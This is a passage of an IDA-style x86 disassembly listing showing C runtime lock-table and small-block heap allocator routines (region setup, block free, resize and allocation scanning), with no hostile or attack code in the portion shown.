loc_4058F1: ; CODE XREF: sub_4058CA+12�j
; sub_4058CA+18�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_4058D8
mov esi, offset dword_423800
pop edi
loc_405902: ; CODE XREF: sub_4058CA+50�j
mov eax, [esi]
test eax, eax
jz short loc_405911
cmp dword ptr [esi+4], 1
jnz short loc_405911
push eax
call ebx
loc_405911: ; CODE XREF: sub_4058CA+3C�j
; sub_4058CA+42�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_405902
pop esi
pop ebx
retn
sub_4058CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40591F proc near ; CODE XREF: sub_402ADF+2�p
; sub_403659+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ds:dword_423800[eax*8]
call ds:dword_41D16C
pop ebp
retn
sub_40591F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405934 proc near ; CODE XREF: sub_4059F7+14�p
; sub_4084A1+4F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4214D8
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp ds:dword_425F68, ebx
jnz short loc_405968
call sub_409C54
push 1Eh
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
loc_405968: ; CODE XREF: sub_405934+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:423800h[esi*8]
cmp [esi], ebx
jz short loc_40597A
mov eax, edi
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_40597A: ; CODE XREF: sub_405934+40�j
push 18h
call sub_40773A
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_405997
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_405997: ; CODE XREF: sub_405934+52�j
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4059D2
push 0FA0h
push edi
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_4059CE
push edi
call sub_403603
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059CE: ; CODE XREF: sub_405934+81�j
mov [esi], edi
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_405934+70�j
push edi
call sub_403603
pop ecx
loc_4059D9: ; CODE XREF: sub_405934+98�j
; sub_405934+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4059EE
mov eax, [ebp+var_1C]
loc_4059E8: ; CODE XREF: sub_405934+44�j
; sub_405934+61�j
call __SEH_epilog4
retn
sub_405934 endp
; =============== S U B R O U T I N E =======================================
sub_4059EE proc near ; CODE XREF: sub_405934+AC�p
; DATA XREF: .kSjx934:004214F0�o
push 0Ah
call sub_40591F
pop ecx
retn
sub_4059EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059F7 proc near ; CODE XREF: sub_402A45+44�p
; sub_403603+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:423800h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405A1D
push eax
call sub_405934
test eax, eax
pop ecx
jnz short loc_405A1D
push 11h
call sub_40785D
pop ecx
loc_405A1D: ; CODE XREF: sub_4059F7+11�j
; sub_4059F7+1C�j
push dword ptr [esi]
call ds:dword_41D168
pop esi
pop ebp
retn
sub_4059F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A28 proc near ; CODE XREF: sub_405A83:loc_405AA6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_407906
test eax, eax
pop ecx
jz short loc_405A51
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A51: ; CODE XREF: sub_405A28+1A�j
lea eax, [ebp+var_8]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_405A6C
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A6C: ; CODE XREF: sub_405A28+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405A7E
cmp [ebp+var_8], 5
jb short loc_405A7E
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A7E: ; CODE XREF: sub_405A28+49�j
; sub_405A28+4F�j
push 3
pop eax
leave
retn
sub_405A28 endp
; =============== S U B R O U T I N E =======================================
sub_405A83 proc near ; CODE XREF: .kSjx934:00404009�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41D160
test eax, eax
mov ds:dword_425F68, eax
jnz short loc_405AA6
loc_405AA3: ; CODE XREF: sub_405A83+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405AA6: ; CODE XREF: sub_405A83+1E�j
call sub_405A28
cmp eax, 3
mov ds:dword_434DF4, eax
jnz short loc_405AD9
push 3F8h
call sub_405ADD
test eax, eax
pop ecx
jnz short loc_405AD9
push ds:dword_425F68
call ds:dword_41D164
and ds:dword_425F68, 0
jmp short loc_405AA3
; ---------------------------------------------------------------------------
loc_405AD9: ; CODE XREF: sub_405A83+30�j
; sub_405A83+3F�j
xor eax, eax
inc eax
retn
sub_405A83 endp
; =============== S U B R O U T I N E =======================================
sub_405ADD proc near ; CODE XREF: sub_405A83+37�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_425F68
call ds:dword_41D114
test eax, eax
mov ds:dword_434DE0, eax
jnz short loc_405AFA
retn
; ---------------------------------------------------------------------------
loc_405AFA: ; CODE XREF: sub_405ADD+1A�j
mov ecx, [esp+arg_0]
and ds:dword_425F6C, 0
and ds:dword_434DDC, 0
mov ds:dword_434DE8, eax
xor eax, eax
mov ds:dword_434DE4, ecx
mov ds:dword_434DEC, 10h
inc eax
retn
sub_405ADD endp
; =============== S U B R O U T I N E =======================================
sub_405B25 proc near ; CODE XREF: sub_402A45+4E�p
; sub_403603+29�p ...
arg_0 = dword ptr 4
mov ecx, ds:dword_434DDC
mov eax, ds:dword_434DE0
imul ecx, 14h
add ecx, eax
jmp short loc_405B49
; ---------------------------------------------------------------------------
loc_405B37: ; CODE XREF: sub_405B25+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_405B4F
add eax, 14h
loc_405B49: ; CODE XREF: sub_405B25+10�j
cmp eax, ecx
jb short loc_405B37
xor eax, eax
locret_405B4F: ; CODE XREF: sub_405B25+1F�j
retn
sub_405B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B50 proc near ; CODE XREF: sub_403603+38�p
; sub_40DA6D+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_405E60
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405C1B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405BB3
push 3Fh
pop edx
loc_405BB3: ; CODE XREF: sub_405B50+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405BFD
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405BDE
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_405BFA
; ---------------------------------------------------------------------------
loc_405BDE: ; CODE XREF: sub_405B50+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_405BFA: ; CODE XREF: sub_405B50+85�j
; sub_405B50+8C�j ...
mov ebx, [ebp+arg_4]
loc_405BFD: ; CODE XREF: sub_405B50+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405C1B: ; CODE XREF: sub_405B50+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405C29
push 3Fh
pop edx
loc_405C29: ; CODE XREF: sub_405B50+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_405CC7
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_405C4E
mov ebx, esi
loc_405C4E: ; CODE XREF: sub_405B50+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_405C60
mov edx, esi
loc_405C60: ; CODE XREF: sub_405B50+10C�j
cmp ebx, edx
jz short loc_405CC2
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_405CAA
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_405C90
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_405CAA
; ---------------------------------------------------------------------------
loc_405C90: ; CODE XREF: sub_405B50+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_405CAA: ; CODE XREF: sub_405B50+11D�j
; sub_405B50+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_405CC2: ; CODE XREF: sub_405B50+112�j
mov esi, [ebp+arg_4]
jmp short loc_405CCA
; ---------------------------------------------------------------------------
loc_405CC7: ; CODE XREF: sub_405B50+E2�j
mov ebx, [ebp+arg_0]
loc_405CCA: ; CODE XREF: sub_405B50+175�j
cmp [ebp+var_C], 0
jnz short loc_405CD8
cmp ebx, edx
jz loc_405D58
loc_405CD8: ; CODE XREF: sub_405B50+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_405D58
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_405D2F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D1E
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_405D1E: ; CODE XREF: sub_405B50+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_405D58
; ---------------------------------------------------------------------------
loc_405D2F: ; CODE XREF: sub_405B50+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D45
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_405D45: ; CODE XREF: sub_405B50+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_405D58: ; CODE XREF: sub_405B50+182�j
; sub_405B50+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_405E5F
mov eax, ds:dword_425F6C
test eax, eax
jz loc_405E51
mov ecx, ds:dword_434DF0
mov esi, ds:dword_41D15C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi
mov ecx, ds:dword_434DF0
mov eax, ds:dword_425F6C
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
mov ecx, ds:dword_434DF0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_425F6C
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_405DE6
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_425F6C
loc_405DE6: ; CODE XREF: sub_405B50+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_405E51
push ebx
push 0
push dword ptr [eax+0Ch]
call esi
mov eax, ds:dword_425F6C
push dword ptr [eax+10h]
push 0
push ds:dword_425F68
call ds:dword_41D10C
mov ecx, ds:dword_434DDC
mov eax, ds:dword_425F6C
imul ecx, 14h
mov edx, ds:dword_434DE0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_407370
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_434DDC
cmp eax, ds:dword_425F6C
jbe short loc_405E47
sub [ebp+arg_0], 14h
loc_405E47: ; CODE XREF: sub_405B50+2F1�j
mov eax, ds:dword_434DE0
mov ds:dword_434DE8, eax
loc_405E51: ; CODE XREF: sub_405B50+223�j
; sub_405B50+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_425F6C, eax
mov ds:dword_434DF0, edi
loc_405E5F: ; CODE XREF: sub_405B50+216�j
pop ebx
loc_405E60: ; CODE XREF: sub_405B50+37�j
pop edi
pop esi
leave
retn
sub_405B50 endp
; =============== S U B R O U T I N E =======================================
sub_405E64 proc near ; CODE XREF: sub_4062F9+C0�p
mov eax, ds:dword_434DEC
push esi
mov esi, ds:dword_434DDC
push edi
xor edi, edi
cmp esi, eax
jnz short loc_405EAB
add eax, 10h
imul eax, 14h
push eax
push ds:dword_434DE0
push edi
push ds:dword_425F68
call ds:dword_41D154
cmp eax, edi
jnz short loc_405E99
loc_405E95: ; CODE XREF: sub_405E64+68�j
; sub_405E64+94�j
xor eax, eax
jmp short loc_405F11
; ---------------------------------------------------------------------------
loc_405E99: ; CODE XREF: sub_405E64+2F�j
add ds:dword_434DEC, 10h
mov esi, ds:dword_434DDC
mov ds:dword_434DE0, eax
loc_405EAB: ; CODE XREF: sub_405E64+11�j
imul esi, 14h
add esi, ds:dword_434DE0
push 41C4h
push 8
push ds:dword_425F68
call ds:dword_41D114
cmp eax, edi
mov [esi+10h], eax
jz short loc_405E95
push 4
push 2000h
push 100000h
push edi
call ds:dword_41D158
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_405EFA
push dword ptr [esi+10h]
push edi
push ds:dword_425F68
call ds:dword_41D10C
jmp short loc_405E95
; ---------------------------------------------------------------------------
loc_405EFA: ; CODE XREF: sub_405E64+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_434DDC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_405F11: ; CODE XREF: sub_405E64+33�j
pop edi
pop esi
retn
sub_405E64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F14 proc near ; CODE XREF: sub_4062F9+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_405F2C
; ---------------------------------------------------------------------------
loc_405F29: ; CODE XREF: sub_405F14+1A�j
add eax, eax
inc ebx
loc_405F2C: ; CODE XREF: sub_405F14+13�j
test eax, eax
jge short loc_405F29
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_405F45: ; CODE XREF: sub_405F14+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_405F45
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41D158
test eax, eax
jnz short loc_405F78
or eax, 0FFFFFFFFh
jmp loc_406015
; ---------------------------------------------------------------------------
loc_405F78: ; CODE XREF: sub_405F14+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_405FC8
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_405F90: ; CODE XREF: sub_405F14+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_405F90
mov edx, [ebp+var_4]
loc_405FC8: ; CODE XREF: sub_405F14+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_406005
or [eax+4], edi
loc_406005: ; CODE XREF: sub_405F14+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_406015: ; CODE XREF: sub_405F14+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405F14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40601A proc near ; CODE XREF: sub_40DA6D+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4061BC
test bl, 1
jnz loc_4061B5
add ebx, ecx
cmp esi, ebx
jg loc_4061B5
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_40608F
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_40608F: ; CODE XREF: sub_40601A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4060DA
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4060BB
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4060DA
; ---------------------------------------------------------------------------
loc_4060BB: ; CODE XREF: sub_40601A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4060DA: ; CODE XREF: sub_40601A+7B�j
; sub_40601A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4061A3
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_406114
push 3Fh
pop edi
loc_406114: ; CODE XREF: sub_40601A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_406191
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_406168
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_406160
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_406160: ; CODE XREF: sub_40601A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_406188
; ---------------------------------------------------------------------------
loc_406168: ; CODE XREF: sub_40601A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40617E
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40617E: ; CODE XREF: sub_40601A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_406188: ; CODE XREF: sub_40601A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406191: ; CODE XREF: sub_40601A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4061A6
; ---------------------------------------------------------------------------
loc_4061A3: ; CODE XREF: sub_40601A+DE�j
mov edx, [ebp+arg_4]
loc_4061A6: ; CODE XREF: sub_40601A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4062F1
; ---------------------------------------------------------------------------
loc_4061B5: ; CODE XREF: sub_40601A+50�j
; sub_40601A+5A�j
xor eax, eax
jmp loc_4062F4
; ---------------------------------------------------------------------------
loc_4061BC: ; CODE XREF: sub_40601A+47�j
jge loc_4062F1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4061E7
push 3Fh
pop esi
loc_4061E7: ; CODE XREF: sub_40601A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_406271
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406200
push 3Fh
pop esi
loc_406200: ; CODE XREF: sub_40601A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_40624A
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_40622B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_406247
; ---------------------------------------------------------------------------
loc_40622B: ; CODE XREF: sub_40601A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_406247: ; CODE XREF: sub_40601A+208�j
; sub_40601A+20F�j ...
mov ebx, [ebp+arg_4]
loc_40624A: ; CODE XREF: sub_40601A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406271
push 3Fh
pop esi
loc_406271: ; CODE XREF: sub_40601A+1D1�j
; sub_40601A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4062E8
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_4062BF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062B7
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_4062B7: ; CODE XREF: sub_40601A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_4062DF
; ---------------------------------------------------------------------------
loc_4062BF: ; CODE XREF: sub_40601A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062D5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_4062D5: ; CODE XREF: sub_40601A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_4062DF: ; CODE XREF: sub_40601A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4062E8: ; CODE XREF: sub_40601A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4062F1: ; CODE XREF: sub_40601A+196�j
; sub_40601A:loc_4061BC�j
xor eax, eax
inc eax
loc_4062F4: ; CODE XREF: sub_40601A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40601A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F9 proc near ; CODE XREF: sub_403691+28�p
; sub_40D94F+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_434DDC
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, ds:dword_434DE0
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_406330
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_40633D
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_4062F9+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_40633D: ; CODE XREF: sub_4062F9+35�j
mov ecx, ds:dword_434DE8
mov ebx, ecx
jmp short loc_406358
; ---------------------------------------------------------------------------
loc_406347: ; CODE XREF: sub_4062F9+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40635F
add ebx, 14h
loc_406358: ; CODE XREF: sub_4062F9+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_406347
loc_40635F: ; CODE XREF: sub_4062F9+5A�j
cmp ebx, eax
jnz short loc_4063E2
mov ebx, ds:dword_434DE0
jmp short loc_40637C
; ---------------------------------------------------------------------------
loc_40636B: ; CODE XREF: sub_4062F9+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_406383
add ebx, 14h
loc_40637C: ; CODE XREF: sub_4062F9+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_40636B
loc_406383: ; CODE XREF: sub_4062F9+7E�j
cmp ebx, ecx
jnz short loc_4063E2
jmp short loc_406395
; ---------------------------------------------------------------------------
loc_406389: ; CODE XREF: sub_4062F9+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_406399
add ebx, 14h
mov [ebp+arg_0], ebx
